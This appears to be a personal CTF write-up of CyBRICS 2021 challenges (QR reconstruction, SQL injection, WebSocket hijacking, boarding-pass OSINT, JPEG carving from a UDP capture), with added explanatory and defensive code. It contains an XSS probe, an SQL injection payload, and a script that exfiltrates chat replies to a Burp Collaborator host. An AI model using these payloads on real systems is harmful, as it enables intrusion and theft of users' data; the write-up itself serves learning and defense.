CyBRICS CTF
This time I managed roughly four challenges (two of them together with teammates); on the second day I didn't solve a single one. Painful.
When will I finally get stronger (one can hope...)
scanner
Wrote a script to dump the QR code, then touched it up in Photoshop so it would scan (my script's output wasn't square...)
from PIL import Image, ImageSequence

# Step 1 (run once): split the GIF into individual RGB frames.
# im = Image.open("vid.gif")
# # print(im.size)  -> (1080, 1080)
# index = 1
# for frame in ImageSequence.Iterator(im):
#     frame = frame.convert("RGB")
#     frame.save("hack/kill{}.png".format(index))
#     index += 1

points = []
index = 20

def search(png):
    # collect every black pixel of a frame, shifted vertically by 21 rows per frame
    for x in range(0, 1080):
        for y in range(0, 1080):
            # print(png.getpixel((x, y)))
            if png.getpixel((x, y)) == (0, 0, 0):
                points.append((x, y - index * 21))

# im = Image.open("hack/kill9.png")
# search(im)
# print(points)
# each frame only shows the band between rows 496 and 517 -> 21 rows, hence the offset

for i in range(1, 146):
    index -= 1
    print(index)
    im = Image.open("hack/kill{}.png".format(i))
    search(im)

# mode "1" is a 1-bit image: white (255) background, black pixels painted with 0
pic = Image.new('1', (1080, 3200), 255)
for poin in points:
    pic.putpixel(poin, 0)
pic.save("hack/example.png")
announcement
It seems there is only one API, the one that sends the email.
Let's see whether there is any more information.
POSTing something: what does it do?
digest=311003a76495b5a4207add1e272c755f&email=q2313%40qq.com
It seems each email gets its own matching digest.
So? If we could work out the pattern, could we change the email value and do something with it?
Feels like an XSS challenge?
Construct
<svg/onload=alert(xss)>
to trigger XSS in it.
<div class="fw-bolder">Form submission successful! We will contact you by the email 16032658@qq.com in three days (before July 27).</div>
Turned out to be an injection challenge; a simple script dumps the flag.
cybrics{1N53r7_0ld_900d_5ql}
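To make concrete what "it was an injection" means for this form, here is an added example written for this writeup, not the challenge's own backend (which is not shown). The flag name hints that the injectable statement was an INSERT, so the example uses one; the table layout, the flag value and the sample inputs are constructed. The vulnerable insert builds its SQL by string formatting; the hardened one binds the email as a parameter.

```python
import sqlite3

FLAG = "cybrics{constructed_placeholder_flag}"   # constructed, not the real flag

def make_db():
    """In-memory database standing in for the challenge backend (constructed schema)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE submissions (email TEXT, digest TEXT)")
    con.execute("CREATE TABLE secrets (flag TEXT)")
    con.execute("INSERT INTO secrets VALUES (?)", (FLAG,))
    return con

def insert_vulnerable(con, email, digest):
    # The submitted email is pasted into the SQL text, so a quote inside it ends
    # the string literal and whatever follows is executed as SQL.
    sql = "INSERT INTO submissions (email, digest) VALUES ('%s', '%s')" % (email, digest)
    con.execute(sql)

def insert_safe(con, email, digest):
    # Placeholders keep the value out of the SQL grammar: the driver binds it as data.
    con.execute("INSERT INTO submissions (email, digest) VALUES (?, ?)", (email, digest))

def rows(con):
    return list(con.execute("SELECT email, digest FROM submissions ORDER BY rowid"))

# A value that closes the email literal and supplies the digest column from a
# subquery; the trailing "-- " comments out the remainder of the original statement.
PAYLOAD = "x@example.test', (SELECT flag FROM secrets)) -- "
DIGEST = "311003a76495b5a4207add1e272c755f"   # the digest value seen in the request above

def demo():
    """Run the same submission through both versions and return what each stored."""
    vuln = make_db()
    insert_vulnerable(vuln, PAYLOAD, DIGEST)
    safe = make_db()
    insert_safe(safe, PAYLOAD, DIGEST)
    return rows(vuln), rows(safe)

if __name__ == "__main__":
    vulnerable_rows, safe_rows = demo()
    print("vulnerable stored:", vulnerable_rows)
    print("safe stored:     ", safe_rows)
```

With the formatted query the stored digest is the secret pulled from another table; with the bound parameter the whole payload, quotes and all, is stored as the email string and nothing else happens.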
CAPTCHA The Flag
Guessing challenges? On my CyBRICS? It’s more likely than you think.
Prove you’re a true CTFer!
Pure manual work: repeated 25 times to get the flag. Exhausting...
multichat
Sending messages is a real hassle...
It really gives you only one message...
Is there anything exploitable in the cookie? No.
Found that the admin interacts with the URL we submit.
Host a phishing page on my own VPS.
CSRF
Didn't get it to work:
<script>
// open a socket to the chat from the page the admin is lured to
var ws = new WebSocket('ws://multichat-cybrics2021.ctf.su/ws');
ws.onopen = function() {
    ws.send("Hey, i forgot the flag. Can you remind me?");
};
ws.onmessage = function(event) {
    // forward the reply to the Collaborator server
    fetch('https://von3nc1ll1rvwvn4tqnub7o7kyqoed.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>
After the contest I asked a senior: changing one line is enough.
<script>
var ws = new WebSocket('ws://multichat-cybrics2021.ctf.su/ws');
ws.onopen = function() {
    ws.send("Hey, i forgot the flag. Can you remind me?");
};
ws.onmessage = function(event) {
    // image beacon instead of fetch: the reply is appended to the URL
    new Image().src="https://von3nc1ll1rvwvn4tqnub7o7kyqoed.burpcollaborator.net"+event.data;
};
</script>
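The payload above works because the admin's browser opens the WebSocket from a page on a foreign origin and the chat server still treats the connection as the admin's (cross-site WebSocket hijacking). As an added example, not part of the writeup or of the challenge's code, here is the handshake-time check a defender would put in front of such a chat, written as a plain function over the upgrade request's headers. The allowed origins and the sample header sets are assumptions; the writeup only shows the ws:// host.

```python
from urllib.parse import urlsplit

# Origins that may open a socket to the chat (assumed; the writeup only shows the ws:// host).
ALLOWED_ORIGINS = {
    "http://multichat-cybrics2021.ctf.su",
    "https://multichat-cybrics2021.ctf.su",
}

def normalize_origin(value):
    """Return scheme://host[:port] for a well-formed Origin header, else None."""
    if value is None or value == "null":
        return None                      # absent or opaque origin: nothing to trust
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    if parts.path or parts.query or parts.fragment:
        return None                      # an Origin never carries a path
    return "{}://{}".format(parts.scheme, parts.netloc.lower())

def handshake_allowed(headers, allowed=ALLOWED_ORIGINS):
    """Decide whether a WebSocket upgrade may proceed, by exact Origin match."""
    origin = normalize_origin(headers.get("Origin"))
    return origin is not None and origin in allowed

def substring_check(headers):
    """The weak check this replaces: passes any origin that merely contains the host."""
    origin = headers.get("Origin") or ""
    return "multichat-cybrics2021.ctf.su" in origin

# Constructed upgrade headers: the legitimate page, a page on an attacker's VPS
# (the phishing page from the writeup), a look-alike host and no Origin at all.
SAME_SITE = {"Upgrade": "websocket", "Origin": "http://multichat-cybrics2021.ctf.su"}
FOREIGN = {"Upgrade": "websocket", "Origin": "http://attacker-vps.example"}
LOOKALIKE = {"Upgrade": "websocket", "Origin": "http://multichat-cybrics2021.ctf.su.attacker.example"}
NO_ORIGIN = {"Upgrade": "websocket"}

if __name__ == "__main__":
    cases = [("same-site", SAME_SITE), ("foreign", FOREIGN),
             ("look-alike", LOOKALIKE), ("no origin", NO_ORIGIN)]
    for name, hdrs in cases:
        print("{:<10} exact={} substring={}".format(
            name, handshake_allowed(hdrs), substring_check(hdrs)))
```

Only the exact match rejects the look-alike host; a substring test accepts it, which is the usual way an Origin check gets bypassed. Rejecting a missing Origin is deliberate for a chat that authenticates with cookies: browsers always send the header on WebSocket handshakes, so its absence means a non-browser client.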
Signer
The .py file is handed out directly; have a look.
Ugh, couldn't solve it.
checkname
We obtained the home folder from a criminal's computer. Try to find his/her real name.
.bash_history
git add *
git commit -m "instagram filter"
git push origin main
rm *
ls -la
rm -rf .git
.profile
# ~/.profile: executed by Bourne-compatible login shells.
if [ "$BASH" ]; then
    if [ -f ~/.bashrc ]; then
        . ~/.bashrc
    fi
fi
mesg n 2> /dev/null || true
.bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
[ -z "$PS1" ] && return

# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] && eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] && tput setaf 1 >&/dev/null; then
        # We have color support; assume it's compliant with Ecma-48
        # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
        # a case would tend to support setf rather than setaf.)
        color_prompt=yes
    else
        color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
#if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
#    . /etc/bash_completion
#fi
.profile and .bashrc are both shell startup configuration files, playing a role similar to autoexec.bat under Microsoft DOS/Windows; below is a description of each of the two files.
Maybe start from the hacker's personal habits?
Aliases, for example?
# If this is an xterm set the title to user@host:dir
Tried searching for vividcoala with no result; stuck.
Post-contest reproduction
Instagram is a social app (never heard of it, ugh).
Found this account; it has a photo of a plane ticket with the name redacted but the barcode left untouched.
Then analyze the barcode,
which yields this person's real name.
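The writeup does not say what kind of barcode it was. Airline boarding passes normally encode the IATA Bar Coded Boarding Pass (BCBP) string, whose first 60 characters are fixed-width mandatory fields starting with the passenger name, which is why an unredacted barcode undoes a redacted name. As an added example (my code, not the writeup's, and assuming the barcode was BCBP), the parser below decodes a constructed BCBP string; the sample passenger, booking reference and flight are made up.

```python
# Fixed-width mandatory items of an IATA BCBP "M" format string, in order.
# (name, width); together they occupy the first 60 characters of the barcode text.
BCBP_FIELDS = [
    ("format_code", 1),
    ("legs", 1),
    ("passenger_name", 20),
    ("eticket_indicator", 1),
    ("pnr", 7),
    ("from_airport", 3),
    ("to_airport", 3),
    ("carrier", 3),
    ("flight_number", 5),
    ("day_of_year", 3),
    ("compartment", 1),
    ("seat", 4),
    ("sequence", 5),
    ("passenger_status", 1),
    ("conditional_size_hex", 2),
]

def parse_bcbp(text):
    """Split the fixed part of a BCBP string into labelled fields (padding stripped)."""
    if not text.startswith("M") or len(text) < 60:
        raise ValueError("not a BCBP 'M' format string of at least 60 characters")
    fields, pos = {}, 0
    for name, width in BCBP_FIELDS:
        fields[name] = text[pos:pos + width].strip()
        pos += width
    # the name field is SURNAME/GIVEN NAMES, left-justified and space padded
    surname, _, given = fields["passenger_name"].partition("/")
    fields["surname"], fields["given_names"] = surname, given
    fields["day_of_year"] = int(fields["day_of_year"])
    return fields

def pii_summary(fields):
    """The personal data a stranger learns from one photo of the barcode."""
    return {
        "name": "{} {}".format(fields["given_names"], fields["surname"]).strip(),
        "booking_reference": fields["pnr"],
        "route": "{}-{}".format(fields["from_airport"], fields["to_airport"]),
        "flight": "{}{}".format(fields["carrier"], fields["flight_number"].lstrip("0")),
        "seat": fields["seat"],
        "day_of_year": fields["day_of_year"],
    }

# Constructed sample: surname DOE, given name JOHN, booking ABC123, SVO to LED,
# carrier SU flight 0001 on day 200 of the year, economy, seat 001A, sequence 1.
SAMPLE = ("M1" + "DOE/JOHN".ljust(20) + "E" + "ABC123".ljust(7)
          + "SVO" + "LED" + "SU " + "0001 " + "200" + "Y" + "001A" + "0001 " + "1" + "00")

if __name__ == "__main__":
    for key, value in pii_summary(parse_bcbp(SAMPLE)).items():
        print("{:<18} {}".format(key, value))
```

The booking reference is the part worth noticing beyond the name: with it and the surname, an airline's manage-booking page usually shows the full itinerary, which is why security advice is to treat a boarding pass photo like a ticket number, not like a souvenir.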
lx100
What is the lx100?
A camera.
Throw a random request from the capture into Google:
GET /cam.cgi?mode=camcmd&value=recmode HTTP/1.1
Found a GitHub repository, https://github.com/cleverfox/lumixproto,
which documents the camera's interfaces.
Located the interface that transfers video
and found that it is transmitted over UDP.
Filter out all the UDP packets
and export the data.
Opened in 010 Editor, search for FF D8 and FF D9:
455 images found.
Write a script to extract all 455 images?
# "seek.txt" holds one hex file offset per line: the FF D8 positions found in 010 Editor,
# in ascending order. "fu" is the raw UDP payload exported from the capture.
offsets = []
with open("seek.txt", "r") as s:
    for line in s.readlines():
        line = line.strip()          # drop the line ending (CRLF or LF) and stray spaces
        if line:
            offsets.append(int(line, 16))

with open("fu", "rb") as dump:
    data = dump.read()

# Each image runs from its SOI offset to the next SOI offset (the last one to end of file).
# Reading to end of file would also produce viewable files, because decoders stop at the
# EOI marker, but it would store the rest of the dump inside every jpg.
for index, head in enumerate(offsets, start=1):
    tail = offsets[index] if index < len(offsets) else len(data)
    with open("photo/{}.jpg".format(index), "wb") as jpg:
        jpg.write(data[head:tail])
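The two searches in 010 Editor plus the offset list can be folded into one carver. As an added example (my code, not the writeup's), the function below walks the marker structure of each JPEG it finds in a byte blob instead of stopping at the first FF D9 after an FF D8: a JPEG with an embedded EXIF thumbnail carries a second FF D9 inside its APP1 segment, and a naive carver truncates such files. The blob is constructed inline; it is structurally valid for the walker but not a decodable picture.

```python
SOI = b"\xff\xd8\xff"   # start of image, always followed by another marker byte

def _jpeg_end(blob, start):
    """Return the offset just past the EOI of the JPEG starting at `start`, or None."""
    i, n = start + 2, len(blob)
    while i + 1 < n:
        if blob[i] != 0xFF:
            return None                       # lost marker sync: not a JPEG we can trust
        marker = blob[i + 1]
        if marker == 0xFF:                    # fill byte before a marker
            i += 1
            continue
        if marker == 0xD9:                    # EOI
            return i + 2
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            i += 2                            # standalone markers carry no length
            continue
        if i + 4 > n:
            return None
        seg_len = int.from_bytes(blob[i + 2:i + 4], "big")
        if seg_len < 2:
            return None
        i += 2 + seg_len                      # skip the segment (APP1 thumbnails live here)
        if marker == 0xDA:                    # SOS: entropy-coded data until the next real marker
            while i + 1 < n:
                nxt = blob[i + 1]
                if blob[i] == 0xFF and nxt not in (0x00, 0xFF) and not 0xD0 <= nxt <= 0xD7:
                    break                     # FF 00 is byte stuffing, FF D0-D7 are restart markers
                i += 1
    return None

def carve_jpegs(blob):
    """Structure-aware carving: every JPEG in `blob`, each cut at its own EOI."""
    found, pos = [], 0
    while True:
        start = blob.find(SOI, pos)
        if start < 0:
            return found
        end = _jpeg_end(blob, start)
        if end is None:
            pos = start + 1                   # false positive or truncated, keep scanning
            continue
        found.append(blob[start:end])
        pos = end

def carve_naive(blob):
    """What 'search FF D8, then FF D9' does: stops at the first EOI, thumbnail or not."""
    found, pos = [], 0
    while True:
        start = blob.find(SOI, pos)
        if start < 0:
            return found
        end = blob.find(b"\xff\xd9", start)
        if end < 0:
            return found
        found.append(blob[start:end + 2])
        pos = end + 2

# Constructed test data: a helper builds marker segments, then a JPEG whose APP1
# holds a thumbnail JPEG (with its own EOI), some filler, and a second plain JPEG.
def _seg(marker, payload):
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload

THUMB = (b"\xff\xd8" + _seg(0xDB, b"\x00\x01\x02") + _seg(0xDA, b"\x01\x01\x00")
         + b"\x12\xff\x00\x34" + b"\xff\xd9")
WITH_THUMB = (b"\xff\xd8" + _seg(0xE1, b"Exif\x00\x00" + THUMB) + _seg(0xDB, b"\x00\x01\x02")
              + _seg(0xDA, b"\x01\x01\x00") + b"\xab\xff\x00\xcd\xff\xd0\xef" + b"\xff\xd9")
PLAIN = (b"\xff\xd8" + _seg(0xDB, b"\x00\x01\x02") + _seg(0xDA, b"\x01\x01\x00")
         + b"\x99\xff\x00\x88" + b"\xff\xd9")
FILLER = b"\x00udp payload filler\x00" * 3      # stands in for the non-image UDP bytes
BLOB = FILLER + WITH_THUMB + FILLER + PLAIN + FILLER

if __name__ == "__main__":
    for k, img in enumerate(carve_jpegs(BLOB), start=1):
        print("image", k, len(img), "bytes")
    print("naive first image:", len(carve_naive(BLOB)[0]), "bytes (truncated at the thumbnail EOI)")
```

On the real dump the same function would be run over the exported UDP payload; files that the walker rejects (None) are usually datagrams lost in the capture, which is worth counting rather than silently skipping when the image count matters.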
And that's it...
Takeaways:
- Learned to gather related information first (before, I just dove in and stared at things without knowing anything)
- Learned to handle data (export, locate, write scripts to extract files...)
- Figured out what the address (offset) information of the images meant